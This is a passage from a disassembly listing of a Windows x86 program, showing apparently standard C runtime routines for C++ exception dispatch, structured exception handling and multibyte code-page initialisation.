call sub_41C791
pop ecx
pop ecx
locret_41C999: ; CODE XREF: sub_41C936+2B�j
; sub_41C936+31�j ...
retn
sub_41C936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C99A proc near ; CODE XREF: sub_41CB16+D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 8
push offset stru_42C5D8
call __SEH_prolog
mov esi, ecx
mov eax, [ebp+arg_4]
mov edi, edx
mov ebx, [ebp+arg_0]
mov ecx, [eax+4]
test ecx, ecx
jz loc_41CB04
cmp byte ptr [ecx+8], 0
jz loc_41CB04
mov ecx, [eax+8]
test ecx, ecx
jnz short loc_41C9D6
test byte ptr [eax+3], 80h
jz loc_41CB04
loc_41C9D6: ; CODE XREF: sub_41C99A+30�j
mov eax, [eax]
test eax, eax
js short loc_41C9E0
lea edi, [ecx+edi+0Ch]
loc_41C9E0: ; CODE XREF: sub_41C99A+40�j
and [ebp+ms_exc.disabled], 0
push 1
push dword ptr [ebx+18h]
test al, 8
jz short loc_41CA22
call sub_42070D
pop ecx
pop ecx
test eax, eax
jz loc_41CAFB
push 1
push edi
call sub_420729
pop ecx
pop ecx
test eax, eax
jz loc_41CAFB
mov eax, [ebx+18h]
mov [edi], eax
loc_41CA13: ; CODE XREF: sub_41C99A+D1�j
lea ecx, [esi+8]
call sub_41C7D6
mov [edi], eax
jmp loc_41CB00
; ---------------------------------------------------------------------------
loc_41CA22: ; CODE XREF: sub_41C99A+51�j
test byte ptr [esi], 1
jz short loc_41CA6D
call sub_42070D
pop ecx
pop ecx
test eax, eax
jz loc_41CAFB
push 1
push edi
call sub_420729
pop ecx
pop ecx
test eax, eax
jz loc_41CAFB
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41F060
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41CB00
mov eax, [edi]
test eax, eax
jz loc_41CB00
jmp short loc_41CA13
; ---------------------------------------------------------------------------
loc_41CA6D: ; CODE XREF: sub_41C99A+8B�j
cmp dword ptr [esi+18h], 0
jnz short loc_41CAA6
call sub_42070D
pop ecx
pop ecx
test eax, eax
jz short loc_41CAFB
push 1
push edi
call sub_420729
pop ecx
pop ecx
test eax, eax
jz short loc_41CAFB
push dword ptr [esi+14h]
lea ecx, [esi+8]
mov eax, [ebx+18h]
call sub_41C7D6
push eax
push edi
call sub_41F060
add esp, 0Ch
jmp short loc_41CB00
; ---------------------------------------------------------------------------
loc_41CAA6: ; CODE XREF: sub_41C99A+D7�j
call sub_42070D
pop ecx
pop ecx
test eax, eax
jz short loc_41CAFB
push 1
push edi
call sub_420729
pop ecx
pop ecx
test eax, eax
jz short loc_41CAFB
push dword ptr [esi+18h]
call sub_420745
pop ecx
test eax, eax
jz short loc_41CAFB
mov eax, [ebx+18h]
lea ecx, [esi+8]
test byte ptr [esi], 4
jz short loc_41CAEA
push 1
call sub_41C7D6
push eax
push dword ptr [esi+18h]
push edi
call sub_417A2A
jmp short loc_41CB00
; ---------------------------------------------------------------------------
loc_41CAEA: ; CODE XREF: sub_41C99A+13B�j
call sub_41C7D6
push eax
push dword ptr [esi+18h]
push edi
call sub_417A2A
jmp short loc_41CB00
; ---------------------------------------------------------------------------
loc_41CAFB: ; CODE XREF: sub_41C99A+5C�j
; sub_41C99A+6E�j ...
call sub_41CEF6
loc_41CB00: ; CODE XREF: sub_41C99A+83�j
; sub_41C99A+C1�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41CB04: ; CODE XREF: sub_41C99A+1B�j
; sub_41C99A+25�j ...
call __SEH_epilog
retn
sub_41C99A endp
; =============== S U B R O U T I N E =======================================
sub_41CB0A proc near ; DATA XREF: .text:stru_42C5D8�o
xor eax, eax
inc eax
retn
sub_41CB0A endp
; ---------------------------------------------------------------------------
loc_41CB0E: ; DATA XREF: .text:stru_42C5D8�o
mov esp, [ebp-18h]
jmp sub_41CEC1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB16 proc near ; CODE XREF: sub_41CB7D+A2�p
; sub_41CC3D+17D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
test ecx, ecx
jz short loc_41CB2A
push ebx
push [ebp+arg_0]
mov edx, esi
call sub_41C99A
pop ecx
pop ecx
loc_41CB2A: ; CODE XREF: sub_41CB16+5�j
cmp [ebp+arg_14], 0
push [ebp+arg_0]
jnz short loc_41CB36
push esi
jmp short loc_41CB39
; ---------------------------------------------------------------------------
loc_41CB36: ; CODE XREF: sub_41CB16+1B�j
push [ebp+arg_14]
loc_41CB39: ; CODE XREF: sub_41CB16+1E�j
call sub_417A31
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_41C6C3
mov eax, [edi+4]
push 100h
push [ebp+arg_10]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_41C7F3
add esp, 28h
test eax, eax
jz short loc_41CB7B
push esi
push eax
call sub_4179FA
loc_41CB7B: ; CODE XREF: sub_41CB16+5C�j
pop ebp
retn
sub_41CB16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB7D proc near ; CODE XREF: sub_41CC3D+1D3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_41CC3A
call sub_4191CF
cmp dword ptr [eax+74h], 0
jz short loc_41CBBC
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_417CAE
add esp, 1Ch
test eax, eax
jnz short loc_41CC3A
loc_41CBBC: ; CODE XREF: sub_41CB7D+1E�j
mov esi, [ebp+arg_14]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_417B4E
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_41CC39
push ebx
loc_41CBE2: ; CODE XREF: sub_41CB7D+B9�j
cmp esi, [edi]
jl short loc_41CC2A
cmp esi, [edi+4]
jg short loc_41CC2A
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41CC03
cmp byte ptr [ecx+8], 0
jnz short loc_41CC2A
loc_41CC03: ; CODE XREF: sub_41CB7D+7E�j
mov esi, [ebp+arg_4]
push 1
push [ebp+arg_1C]
lea ebx, [eax-10h]
push [ebp+arg_18]
xor ecx, ecx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41CB16
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_41CC2A: ; CODE XREF: sub_41CB7D+67�j
; sub_41CB7D+6C�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_41CBE2
pop ebx
loc_41CC39: ; CODE XREF: sub_41CB7D+62�j
pop edi
loc_41CC3A: ; CODE XREF: sub_41CB7D+F�j
; sub_41CB7D+3D�j
pop esi
leave
retn
sub_41CB7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC3D proc near ; CODE XREF: sub_41CE1F+93�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_4]
mov eax, [eax+8]
and byte ptr [ebp+var_1C], 0
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jl short loc_41CC5D
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41CC62
loc_41CC5D: ; CODE XREF: sub_41CC3D+16�j
call sub_41CEF6
loc_41CC62: ; CODE XREF: sub_41CC3D+1E�j
push ebx
mov ebx, [ebp+arg_0]
cmp dword ptr [ebx], 0E06D7363h
push esi
push edi
jnz loc_41CDF4
cmp dword ptr [ebx+10h], 3
mov edi, 19930520h
jnz short loc_41CCEE
cmp [ebx+14h], edi
jnz short loc_41CCEE
cmp dword ptr [ebx+1Ch], 0
jnz short loc_41CCEE
call sub_4191CF
cmp dword ptr [eax+78h], 0
jz loc_41CDEC
call sub_4191CF
mov esi, [eax+78h]
mov [ebp+arg_0], esi
call sub_4191CF
mov eax, [eax+7Ch]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_1C], 1
call sub_42070D
test eax, eax
pop ecx
pop ecx
jnz short loc_41CCC6
call sub_41CEF6
loc_41CCC6: ; CODE XREF: sub_41CC3D+82�j
cmp dword ptr [esi], 0E06D7363h
jnz loc_41CDF1
mov eax, [ebp+arg_0]
cmp dword ptr [eax+10h], 3
jnz short loc_41CCEB
cmp [eax+14h], edi
jnz short loc_41CCEB
cmp dword ptr [eax+1Ch], 0
jnz short loc_41CCEB
call sub_41CEF6
loc_41CCEB: ; CODE XREF: sub_41CC3D+9C�j
; sub_41CC3D+A1�j ...
mov ebx, [ebp+arg_0]
loc_41CCEE: ; CODE XREF: sub_41CC3D+40�j
; sub_41CC3D+45�j ...
cmp dword ptr [ebx], 0E06D7363h
jnz loc_41CDF4
cmp dword ptr [ebx+10h], 3
jnz loc_41CDF4
cmp [ebx+14h], edi
jnz loc_41CDF4
mov esi, [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push esi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_417B4E
mov ecx, [ebp+var_8]
add esp, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jnb loc_41CDDC
jmp short loc_41CD3B
; ---------------------------------------------------------------------------
loc_41CD38: ; CODE XREF: sub_41CC3D+199�j
mov esi, [ebp+var_18]
loc_41CD3B: ; CODE XREF: sub_41CC3D+F9�j
cmp [eax], esi
jg loc_41CDC7
cmp esi, [eax+4]
jg short loc_41CDC7
mov ecx, [eax+0Ch]
test ecx, ecx
mov esi, [eax+10h]
mov [ebp+var_14], ecx
jle short loc_41CDC7
loc_41CD55: ; CODE XREF: sub_41CC3D+15B�j
mov ecx, [ebx+1Ch]
mov ecx, [ecx+0Ch]
lea edx, [ecx+4]
mov ecx, [ecx]
test ecx, ecx
mov [ebp+var_C], edx
mov [ebp+var_10], ecx
jle short loc_41CD8E
loc_41CD6A: ; CODE XREF: sub_41CC3D+14C�j
mov eax, [ebp+var_C]
mov edi, [eax]
push dword ptr [ebx+1Ch]
mov [ebp+var_24], edi
call sub_41C656
test eax, eax
pop ecx
jnz short loc_41CD9C
dec [ebp+var_10]
add [ebp+var_C], 4
cmp [ebp+var_10], eax
jg short loc_41CD6A
mov eax, [ebp+var_4]
loc_41CD8E: ; CODE XREF: sub_41CC3D+12B�j
dec [ebp+var_14]
add esi, 10h
cmp [ebp+var_14], 0
jg short loc_41CD55
jmp short loc_41CDC7
; ---------------------------------------------------------------------------
loc_41CD9C: ; CODE XREF: sub_41CC3D+140�j
push [ebp+var_1C]
mov edi, [ebp+var_4]
push [ebp+arg_1C]
mov ecx, [ebp+var_24]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
mov ebx, esi
mov esi, [ebp+arg_4]
call sub_41CB16
mov ebx, [ebp+arg_0]
add esp, 1Ch
mov eax, edi
loc_41CDC7: ; CODE XREF: sub_41CC3D+100�j
; sub_41CC3D+109�j ...
inc [ebp+var_8]
mov ecx, [ebp+var_8]
add eax, 14h
cmp ecx, [ebp+var_20]
mov [ebp+var_4], eax
jb loc_41CD38
loc_41CDDC: ; CODE XREF: sub_41CC3D+F3�j
cmp [ebp+arg_14], 0
jz short loc_41CDEC
push 1
push ebx
call sub_41C791
pop ecx
pop ecx
loc_41CDEC: ; CODE XREF: sub_41CC3D+56�j
; sub_41CC3D+1A3�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41CDF1: ; CODE XREF: sub_41CC3D+8F�j
mov ebx, [ebp+arg_0]
loc_41CDF4: ; CODE XREF: sub_41CC3D+31�j
; sub_41CC3D+B7�j ...
cmp [ebp+arg_14], 0
jnz short loc_41CE1A
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41CB7D
add esp, 20h
jmp short loc_41CDEC
; ---------------------------------------------------------------------------
loc_41CE1A: ; CODE XREF: sub_41CC3D+1BB�j
jmp sub_41CEC1
sub_41CC3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE1F proc near ; CODE XREF: .text:00417AA4�p
; .text:00417AD4�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_41CE3C
call sub_41CEF6
loc_41CE3C: ; CODE XREF: sub_41CE1F+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41CE64
cmp dword ptr [esi+4], 0
jz short loc_41CEBA
cmp [ebp+arg_14], 0
jnz short loc_41CEBA
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41C6C3
add esp, 10h
jmp short loc_41CEBA
; ---------------------------------------------------------------------------
loc_41CE64: ; CODE XREF: sub_41CE1F+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41CEBA
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41CE9E
cmp [eax+14h], edi
jbe short loc_41CE9E
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41CE9E
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41CEBD
; ---------------------------------------------------------------------------
loc_41CE9E: ; CODE XREF: sub_41CE1F+51�j
; sub_41CE1F+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41CC3D
add esp, 20h
loc_41CEBA: ; CODE XREF: sub_41CE1F+2A�j
; sub_41CE1F+30�j ...
xor eax, eax
inc eax
loc_41CEBD: ; CODE XREF: sub_41CE1F+7D�j
pop edi
pop esi
pop ebp
retn
sub_41CE1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEC1 proc near ; CODE XREF: sub_41C6A5+19�j
; .text:0041C7D1�j ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0042075D SIZE 00000018 BYTES
push 8
push offset stru_42C5E8
call __SEH_prolog
call sub_4191CF
cmp dword ptr [eax+6Ch], 0
jz short loc_41CEF1
and [ebp+ms_exc.disabled], 0
call sub_4191CF
call dword ptr [eax+6Ch]
jmp short loc_41CEED
; ---------------------------------------------------------------------------
loc_41CEE6: ; DATA XREF: .text:stru_42C5E8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41CEEA: ; DATA XREF: .text:stru_42C5E8�o
mov esp, [ebp+ms_exc.old_esp]
loc_41CEED: ; CODE XREF: sub_41CEC1+23�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41CEF1: ; CODE XREF: sub_41CEC1+15�j
jmp loc_42075D
sub_41CEC1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEF6 proc near ; CODE XREF: sub_417B4E+23�p
; sub_417B4E:loc_417BB8�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_42C5F8
call __SEH_prolog
mov eax, off_432A70
test eax, eax
jz short loc_41CF1E
and [ebp+ms_exc.disabled], 0
call eax ; sub_41CEC1
jmp short loc_41CF1A
; ---------------------------------------------------------------------------
loc_41CF13: ; DATA XREF: .text:stru_42C5F8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41CF17: ; DATA XREF: .text:stru_42C5F8�o
mov esp, [ebp+ms_exc.old_esp]
loc_41CF1A: ; CODE XREF: sub_41CEF6+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41CF1E: ; CODE XREF: sub_41CEF6+13�j
jmp sub_41CEC1
sub_41CEF6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF30 proc near ; CODE XREF: sub_417C5D+3D�p
; sub_41C6C3+68�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_417E2D
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41CF6F
mov ecx, 2
loc_41CF6F: ; CODE XREF: sub_41CF30+38�j
push ecx
call sub_417E2D
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41CF30 endp
; =============== S U B R O U T I N E =======================================
sub_41CF7C proc near ; CODE XREF: sub_41D1D5+FF�p
; sub_41D1D5+149�p
sub eax, 3A4h
jz short loc_41CFA5
sub eax, 4
jz short loc_41CF9F
sub eax, 0Dh
jz short loc_41CF99
dec eax
jz short loc_41CF93
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41CF93: ; CODE XREF: sub_41CF7C+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41CF99: ; CODE XREF: sub_41CF7C+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41CF9F: ; CODE XREF: sub_41CF7C+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41CFA5: ; CODE XREF: sub_41CF7C+5�j
mov eax, 411h
retn
sub_41CF7C endp
; =============== S U B R O U T I N E =======================================
sub_41CFAB proc near ; CODE XREF: sub_41D1D5:loc_41D34A�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_481720
rep stosd
stosb
xor eax, eax
mov dword_481824, eax
mov dword_481708, eax
mov dword_481700, eax
mov edi, offset word_481830
stosd
stosd
stosd
pop edi
retn
sub_41CFAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CFD4 proc near ; CODE XREF: sub_41D1D5:loc_41D34F�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_432A68
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_18]
push eax
push dword_481824
call dword_4221B4 ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_41D114
xor eax, eax
loc_41D009: ; CODE XREF: sub_41CFD4+3F�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_41D009
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_41D059
push ebx
lea edx, [ebp+var_11]
push edi
loc_41D028: ; CODE XREF: sub_41CFD4+81�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41D04F
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41D04F: ; CODE XREF: sub_41CFD4+5C�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_41D028
pop edi
pop ebx
loc_41D059: ; CODE XREF: sub_41CFD4+4D�j
push 0
push dword_481700
lea eax, [ebp+var_518]
push dword_481824
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_41E950
push 0
push dword_481824
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push dword_481700
call sub_41C1A9
push 0
push dword_481824
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push dword_481700
call sub_41C1A9
add esp, 5Ch
xor eax, eax
loc_41D0CE: ; CODE XREF: sub_41CFD4+13C�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_41D0F1
or byte_481721[eax], 10h
mov cl, [ebp+eax+var_218]
loc_41D0E9: ; CODE XREF: sub_41CFD4+130�j
mov byte_481840[eax], cl
jmp short loc_41D10D
; ---------------------------------------------------------------------------
loc_41D0F1: ; CODE XREF: sub_41CFD4+105�j
test cl, 2
jz short loc_41D106
or byte_481721[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_41D0E9
; ---------------------------------------------------------------------------
loc_41D106: ; CODE XREF: sub_41CFD4+120�j
and byte_481840[eax], 0
loc_41D10D: ; CODE XREF: sub_41CFD4+11B�j
inc eax
cmp eax, esi
jb short loc_41D0CE
jmp short loc_41D158
; ---------------------------------------------------------------------------
loc_41D114: ; CODE XREF: sub_41CFD4+2D�j
xor eax, eax
loc_41D116: ; CODE XREF: sub_41CFD4+182�j
cmp eax, 41h
jb short loc_41D134
cmp eax, 5Ah
ja short loc_41D134
or byte_481721[eax], 10h
mov cl, al
add cl, 20h
loc_41D12C: ; CODE XREF: sub_41CFD4+176�j
mov byte_481840[eax], cl
jmp short loc_41D153
; ---------------------------------------------------------------------------
loc_41D134: ; CODE XREF: sub_41CFD4+145�j
; sub_41CFD4+14A�j
cmp eax, 61h
jb short loc_41D14C
cmp eax, 7Ah
ja short loc_41D14C
or byte_481721[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41D12C
; ---------------------------------------------------------------------------
loc_41D14C: ; CODE XREF: sub_41CFD4+163�j
; sub_41CFD4+168�j
and byte_481840[eax], 0
loc_41D153: ; CODE XREF: sub_41CFD4+15E�j
inc eax
cmp eax, esi
jb short loc_41D116
loc_41D158: ; CODE XREF: sub_41CFD4+13E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_41C596
leave
retn
sub_41CFD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D166 proc near ; CODE XREF: sub_41D4D9+1A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_42C608
call __SEH_prolog
push 0Dh
call sub_41A1D6
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_4191CF
mov edi, eax
mov [ebp+var_1C], edi
mov esi, [edi+60h]
mov [ebp+var_20], esi
cmp esi, dword_481704
jz short loc_41D1B8
test esi, esi
jz short loc_41D1A5
dec dword ptr [esi]
jnz short loc_41D1A5
push esi
call sub_416D07
pop ecx
loc_41D1A5: ; CODE XREF: sub_41D166+32�j
; sub_41D166+36�j
mov eax, dword_481704
mov [edi+60h], eax
mov esi, dword_481704
mov [ebp+var_20], esi
inc dword ptr [esi]
loc_41D1B8: ; CODE XREF: sub_41D166+2E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D1CC
mov eax, esi
call __SEH_epilog
retn
sub_41D166 endp
; =============== S U B R O U T I N E =======================================
sub_41D1C9 proc near ; DATA XREF: .text:stru_42C608�o
mov esi, [ebp-20h]
sub_41D1C9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41D1CC proc near ; CODE XREF: sub_41D166+56�p
push 0Dh
call sub_41A142
pop ecx
retn
sub_41D1CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D1D5 proc near ; CODE XREF: sub_41D36B+9F�p
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_4], eax
push edi
jz loc_41D34A
xor edx, edx
xor eax, eax
loc_41D1FA: ; CODE XREF: sub_41D1D5+36�j
cmp dword_432A88[eax], esi
jz short loc_41D267
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_41D1FA
lea eax, [ebp+var_1C]
push eax
push esi
call dword_4221B4 ; GetCPInfo
cmp eax, 1
jnz loc_41D342
push 40h
xor eax, eax
cmp [ebp+var_1C], 1
pop ecx
mov edi, offset byte_481720
rep stosd
stosb
mov dword_481824, esi
mov dword_481700, ebx
jbe loc_41D330
cmp [ebp+var_16], 0
jz loc_41D308
lea ecx, [ebp+var_15]
loc_41D251: ; CODE XREF: sub_41D1D5+12D�j
mov dl, [ecx]
test dl, dl
jz loc_41D308
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_41D2F8
; ---------------------------------------------------------------------------
loc_41D267: ; CODE XREF: sub_41D1D5+2B�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_481720
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_8], ebx
stosb
lea ebx, dword_432A98[ecx]
loc_41D283: ; CODE XREF: sub_41D1D5+EB�j
mov al, [ebx]
mov esi, ebx
jmp short loc_41D2B2
; ---------------------------------------------------------------------------
loc_41D289: ; CODE XREF: sub_41D1D5+DF�j
mov dl, [esi+1]
test dl, dl
jz short loc_41D2B6
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_41D2AE
mov edx, [ebp+var_8]
mov dl, byte_432A80[edx]
loc_41D2A3: ; CODE XREF: sub_41D1D5+D7�j
or byte_481721[eax], dl
inc eax
cmp eax, edi
jbe short loc_41D2A3
loc_41D2AE: ; CODE XREF: sub_41D1D5+C3�j
inc esi
inc esi
mov al, [esi]
loc_41D2B2: ; CODE XREF: sub_41D1D5+B2�j
test al, al
jnz short loc_41D289
loc_41D2B6: ; CODE XREF: sub_41D1D5+B9�j
inc [ebp+var_8]
add ebx, 8
cmp [ebp+var_8], 4
jb short loc_41D283
mov eax, [ebp+arg_0]
mov dword_481824, eax
mov dword_481708, 1
call sub_41CF7C
lea ecx, dword_432A8C[ecx]
mov esi, ecx
mov edi, offset word_481830
movsd
movsd
mov dword_481700, eax
movsd
jmp short loc_41D34F
; ---------------------------------------------------------------------------
loc_41D2F0: ; CODE XREF: sub_41D1D5+125�j
or byte_481721[eax], 4
inc eax
loc_41D2F8: ; CODE XREF: sub_41D1D5+8D�j
cmp eax, edx
jbe short loc_41D2F0
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41D251
loc_41D308: ; CODE XREF: sub_41D1D5+73�j
; sub_41D1D5+80�j
xor ecx, ecx
inc ecx
mov eax, ecx
loc_41D30D: ; CODE XREF: sub_41D1D5+145�j
or byte_481721[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41D30D
mov eax, esi
call sub_41CF7C
mov dword_481700, eax
mov dword_481708, ecx
jmp short loc_41D336
; ---------------------------------------------------------------------------
loc_41D330: ; CODE XREF: sub_41D1D5+69�j
mov dword_481708, ebx
loc_41D336: ; CODE XREF: sub_41D1D5+159�j
xor eax, eax
mov edi, offset word_481830
stosd
stosd
stosd
jmp short loc_41D34F
; ---------------------------------------------------------------------------
loc_41D342: ; CODE XREF: sub_41D1D5+46�j
cmp dword_481348, ebx
jz short loc_41D358
loc_41D34A: ; CODE XREF: sub_41D1D5+1B�j
call sub_41CFAB
loc_41D34F: ; CODE XREF: sub_41D1D5+119�j
; sub_41D1D5+16B�j
call sub_41CFD4
xor eax, eax
jmp short loc_41D35B
; ---------------------------------------------------------------------------
loc_41D358: ; CODE XREF: sub_41D1D5+173�j
or eax, 0FFFFFFFFh
loc_41D35B: ; CODE XREF: sub_41D1D5+181�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41C596
leave
retn
sub_41D1D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
